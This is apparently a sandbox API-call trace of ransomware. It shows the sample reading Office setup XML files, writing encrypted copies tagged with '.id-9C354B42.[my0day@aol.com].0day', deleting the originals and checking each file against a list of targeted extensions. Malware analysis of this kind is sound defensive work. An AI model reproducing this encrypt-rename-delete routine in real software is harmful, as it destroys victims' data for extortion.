(lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.544] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=6241) returned 1 [0040.544] CloseHandle (hObject=0x1c4) returned 1 [0040.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml")) returned 0x20 [0040.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.545] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.545] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0040.545] GetLastError () returned 0x0 [0040.545] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x1861, lpOverlapped=0x0) returned 1 [0040.617] WriteFile (in: hFile=0x1fc, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x1870, lpOverlapped=0x0) returned 1 [0040.618] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.618] WriteFile (in: hFile=0x1fc, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.619] SetEndOfFile (hFile=0x1fc) returned 1 [0040.619] CloseHandle (hObject=0x1fc) returned 1 [0040.620] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.620] SetEndOfFile (hFile=0x1c4) returned 1 [0040.620] CloseHandle (hObject=0x1c4) returned 1 [0040.621] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.621] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml")) returned 1 [0040.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.621] lstrlenW (lpString=".doc") returned 4 [0040.621] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.621] lstrlenW (lpString=".docx") returned 5 [0040.621] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.621] lstrlenW (lpString=".pdf") returned 4 [0040.621] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.622] lstrlenW (lpString=".xls") returned 4 [0040.622] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.622] lstrlenW (lpString=".xlsx") returned 5 [0040.622] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.622] lstrlenW (lpString=".ppt") returned 4 [0040.622] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.622] lstrlenW (lpString=".zip") returned 4 [0040.622] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.622] lstrlenW (lpString=".rar") returned 4 [0040.622] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.622] lstrlenW (lpString=".bz2") returned 4 [0040.622] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.622] lstrlenW (lpString=".7z") returned 3 [0040.622] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.622] lstrlenW (lpString=".dbf") returned 4 [0040.622] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.622] lstrlenW (lpString=".1cd") returned 4 [0040.622] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.622] lstrlenW (lpString=".jpg") returned 4 [0040.622] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.622] lstrlenW (lpString=".doc") returned 4 [0040.622] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.622] lstrlenW (lpString=".docx") returned 5 [0040.622] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.622] lstrlenW (lpString=".pdf") returned 4 [0040.622] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.622] lstrlenW (lpString=".xls") returned 4 [0040.623] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.623] lstrlenW (lpString=".xlsx") returned 5 [0040.623] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.623] lstrlenW (lpString=".ppt") returned 4 [0040.623] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.623] lstrlenW (lpString=".zip") returned 4 [0040.623] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.623] lstrlenW (lpString=".rar") returned 4 [0040.623] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.623] lstrlenW (lpString=".bz2") returned 4 [0040.623] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.623] lstrlenW (lpString=".7z") returned 3 [0040.623] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.623] lstrlenW (lpString=".dbf") returned 4 [0040.623] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.623] lstrlenW (lpString=".1cd") returned 4 [0040.623] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.623] lstrlenW (lpString=".jpg") returned 4 [0040.623] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.623] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.623] lstrlenW (lpString="SETUP.XML") returned 9 [0040.623] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.624] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=20577) returned 1 [0040.624] CloseHandle (hObject=0x1c4) returned 1 [0040.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml")) returned 0x20 [0040.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.625] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.625] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.625] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.625] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0040.627] GetLastError () returned 0x0 [0040.628] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x5061, lpOverlapped=0x0) returned 1 [0040.629] WriteFile (in: hFile=0x1fc, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x5070, lpOverlapped=0x0) returned 1 [0040.630] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.630] WriteFile (in: hFile=0x1fc, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.631] SetEndOfFile (hFile=0x1fc) returned 1 [0040.631] CloseHandle (hObject=0x1fc) returned 1 [0040.631] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.632] SetEndOfFile (hFile=0x1c4) returned 1 [0040.632] CloseHandle (hObject=0x1c4) returned 1 [0040.633] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.633] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml")) returned 1 [0040.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.633] lstrlenW (lpString=".doc") returned 4 [0040.633] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.633] lstrlenW (lpString=".docx") returned 5 [0040.633] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.633] lstrlenW (lpString=".pdf") returned 4 [0040.633] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.633] lstrlenW (lpString=".xls") returned 4 [0040.633] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.633] lstrlenW (lpString=".xlsx") returned 5 [0040.633] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.633] lstrlenW (lpString=".ppt") returned 4 [0040.633] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.633] lstrlenW (lpString=".zip") returned 4 [0040.633] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.633] lstrlenW (lpString=".rar") returned 4 [0040.634] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.634] lstrlenW (lpString=".bz2") returned 4 [0040.634] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.634] lstrlenW (lpString=".7z") returned 3 [0040.634] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.634] lstrlenW (lpString=".dbf") returned 4 [0040.634] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.634] lstrlenW (lpString=".1cd") returned 4 [0040.634] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.634] lstrlenW (lpString=".jpg") returned 4 [0040.634] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.634] lstrlenW (lpString=".doc") returned 4 [0040.634] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.634] lstrlenW (lpString=".docx") returned 5 [0040.634] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.634] lstrlenW (lpString=".pdf") returned 4 [0040.634] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.634] lstrlenW (lpString=".xls") returned 4 [0040.634] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.634] lstrlenW (lpString=".xlsx") returned 5 [0040.634] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.634] lstrlenW (lpString=".ppt") returned 4 [0040.634] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.634] lstrlenW (lpString=".zip") returned 4 [0040.634] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.634] lstrlenW (lpString=".rar") returned 4 [0040.634] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.635] lstrlenW (lpString=".bz2") returned 4 [0040.635] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.635] lstrlenW (lpString=".7z") returned 3 [0040.635] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.635] lstrlenW (lpString=".dbf") returned 4 [0040.635] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.635] lstrlenW (lpString=".1cd") returned 4 [0040.635] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.635] lstrlenW (lpString=".jpg") returned 4 [0040.635] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.635] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.635] lstrlenW (lpString="VisiorWW.XML") returned 12 [0040.635] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.635] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=8723) returned 1 [0040.636] CloseHandle (hObject=0x1c4) returned 1 [0040.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml")) returned 0x20 [0040.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.636] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.636] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0040.636] GetLastError () returned 0x0 [0040.636] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x2213, lpOverlapped=0x0) returned 1 [0040.638] WriteFile (in: hFile=0x1fc, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x2220, lpOverlapped=0x0) returned 1 [0040.639] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.639] WriteFile (in: hFile=0x1fc, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.639] SetEndOfFile (hFile=0x1fc) returned 1 [0040.639] CloseHandle (hObject=0x1fc) returned 1 [0040.640] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.640] SetEndOfFile (hFile=0x1c4) returned 1 [0040.640] CloseHandle (hObject=0x1c4) returned 1 [0040.640] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.641] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml")) returned 1 [0040.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.641] lstrlenW (lpString=".doc") returned 4 [0040.641] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.641] lstrlenW (lpString=".docx") returned 5 [0040.641] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.641] lstrlenW (lpString=".pdf") returned 4 [0040.641] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.641] lstrlenW (lpString=".xls") returned 4 [0040.641] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.641] lstrlenW (lpString=".xlsx") returned 5 [0040.641] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.641] lstrlenW (lpString=".ppt") returned 4 [0040.641] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.641] lstrlenW (lpString=".zip") returned 4 [0040.641] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.641] lstrlenW (lpString=".rar") returned 4 [0040.641] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.641] lstrlenW (lpString=".bz2") returned 4 [0040.641] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.641] lstrlenW (lpString=".7z") returned 3 [0040.641] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.642] lstrlenW (lpString=".dbf") returned 4 [0040.642] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.642] lstrlenW (lpString=".1cd") returned 4 [0040.642] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.642] lstrlenW (lpString=".jpg") returned 4 [0040.642] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.642] lstrlenW (lpString=".doc") returned 4 [0040.642] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.642] lstrlenW (lpString=".docx") returned 5 [0040.642] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.642] lstrlenW (lpString=".pdf") returned 4 [0040.642] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.642] lstrlenW (lpString=".xls") returned 4 [0040.642] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.642] lstrlenW (lpString=".xlsx") returned 5 [0040.642] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.642] lstrlenW (lpString=".ppt") returned 4 [0040.642] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.642] lstrlenW (lpString=".zip") returned 4 [0040.642] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.642] lstrlenW (lpString=".rar") returned 4 [0040.642] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.642] lstrlenW (lpString=".bz2") returned 4 [0040.642] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.642] lstrlenW (lpString=".7z") returned 3 [0040.642] 